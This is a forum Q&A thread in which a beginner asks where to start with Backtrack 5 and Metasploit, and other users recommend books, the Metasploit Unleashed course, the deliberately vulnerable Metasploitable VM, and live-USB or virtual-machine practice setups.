6

I have just downloaded Backtrack 5 R2 with Gnome and, while it looks cool, I don't really know where to start.

I see it comes with Metasploit but, to be blunt, I still don't really understand what Metasploit is.

A quick disclaimer, I'm a Windows guy with little experience with Linux.

I understand that I don't need Backtrack to use the tools that Backtrack comes with. Backtrack just makes this convenient. I can install any Linux distro and, after adding the relevant repositories, use apt-get install to install the tools. I also understand that I can get Metasploit for Windows, but get the feeling that it is probably a lot more useful on Linux.

I have a free weekend coming up, and am therefore asking if somebody could recommend a decent book that would bring me up to speed on Backtrack/Metasploit?

kalina
  • 3,354
  • 5
  • 20
  • 36
JMK
  • 2,436
  • 7
  • 27
  • 38
  • 1
    Well, it's only apt-get for package management on debian based distros, there are others, redhat/fedora most well known. – ewanm89 Jul 13 '12 at 10:29

6 Answers6

15

To be very honest, I feel that most of the books out there on Metasploit are outdated, as it gets updated very often.

To learn more about the two, I would first download Metasploitable. This is an old configuration of Ubuntu with security holes for learning purposes.

The Metasploit and Backtrack FAQs are good places to start. Learn what each tool does, Backtrack consist of hundreds of tools, most of them you will probably never use. Take a look at your situation, and find the appropriate tool to use. Google is your good friend here.

Metasploit is simply an exploitation framework. The beauty of it is the ability to combine different exploits with different payloads to adapt to different situations. Metepreter is also an incredibly powerful shell to perform privilege escalation and other attacks from once you gained access.

Once you cracked Metasploitable, there are many other vulnerable VMs to exploit, here is a link to a question i had asked which has suggestions for many good practice boxes.

The key to understanding Backtrack and Metasploit is simply using it and getting familiar with the commands. Basic understanding of linux is of course needed, as many of the task in Backtrack are performed using the command line interface.

If you really want a book - this is highly recommended by others, although i have never actually read it.

I do not however, recommend installing the repositories on another OS unless it is really necessary. Why not use something that just works? Backtrack's theme is very cool to boot.

Community
  • 1
  • 1
    The book referenced above is excellent and I'd highly recommend it. It's easy to read and contains so much goodness. – Mark Hillick Jul 13 '12 at 10:48
6

Congratulations JMK, both of us are exactly in the same boat! You may want to check few questions i have asked on this site about using Metasploit.

In addition to the excellent answers by @Terry-chia and others, I wish to add that one excellent reference which I found for Metasploit is Metasploit unleashed by Offensivesecurity.com. These guys also offer some excellent (paid) online courses, one of them being Penetration with BackTrack- but that is far from a beginner's course and don't think about it for a few months (years?) at least!

I also understand that I can get Metasploit for Windows, but get the feeling that it is probably a lot more useful on Linux.

Your feelings are very right. I also happen to be a 'Windows guy' with little experience with Linux, but trust me it is best to learn on Linux, or rather on BT itself.

BT is nothing but a Linuux distro, so i can't really suggest any books for it. You will surely not need all the tools with which BT comes, at least not at your beginning stage.

Disclaimer: I am in no way associated with offensivesecurity.com - just a fan of their good quality work!

pnp
  • 1,818
  • 2
  • 26
  • 42
4

Metasploitable was recently upgraded - here's the link. This newer version is more stable and includes several updates afaik.

So that you don't nuke something permanently, I'd recommend first playing with Backtrack on a USB key as live install. Here's a good how-to link from the BT5 wiki.

Mark Hillick
  • 2,124
  • 11
  • 14
  • 1
    Why the live CD over a VM? Thanks for the link to the updated metasploitable, I didn't even realise it existed. :P Updated my answer with the new link. –  Jul 13 '12 at 10:55
  • Personal preference for recommending to folk just starting off (especially folk without Linux experience), so less can go wrong. Additionally, for certain pen testing consignments, you have to be careful with what data you leave behind or what you can bring in or out. Getting into the habit of using a usb key (preferably persistent boot) is good practice. – Mark Hillick Jul 13 '12 at 11:00
  • 1
    I would think though, that for learning purposes, a VM would be more appropriate as it is easy to setup a multi host testing environment with a single computer. For example, my computer can run 10-20 VMs at the same time, making it decently easy to setup a networked environment to practice on. I do agree with the live cd(or a laptop that gets securely erased every time) for pen testing jobs though. –  Jul 13 '12 at 11:03
  • 1
    Yep, true but you can have the VM instance boot from the USB also. There's no right or wrong, personal preference. I use the VM option a lot also. – Mark Hillick Jul 13 '12 at 11:06
3

The book Metasploit: The Penetration Testers Guide was quite good (http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X). It was written by people very close to the project (the creator of SET, the creator of BackTrack, to name two) and the forward was written by HD Moore, the creator of Metasploit. It is certainly not out of date, as most of the core stuff mentioned in the book has not changed much. Plus, the book also covers Fast-Track and SET. As mentioned elsewhere, Metasploit Unleashed is also quite informative.

servarevitas3
  • 191
  • 4
2

I second Metasploit: The Penetration Tester's Guide. It actually has some material anybody interested in pentesting should know prior to running the SW. Plus, it also discusses PTES, which is a good foundation any new pentester should explore.

Plus, most of the authors frequent security conferences and are rather friendly.

http://www.pentest-standard.org/index.php/Main_Page

2

I realize I am new to the site but I have dabbled in Security Research and Pentesting. As many have posted, "Metasploit: The Penetration Tester's Guide" would probably be your best bet for learning Metasploit. However, "The Basics of Hacking and Penetration Testing" by Syngress and "Gray Hat Hacking: The Ethical Hacker's Handbook" by McGraw-Hill are good books for getting an intro to some of the other tools that Backtrack offers. However if you're trying to avoid purchasing, then exploit-db.com has some whitepapers that will give you the "essentials" for Metasploit and other popular tools.

ridecontrol53
  • 56
  • 6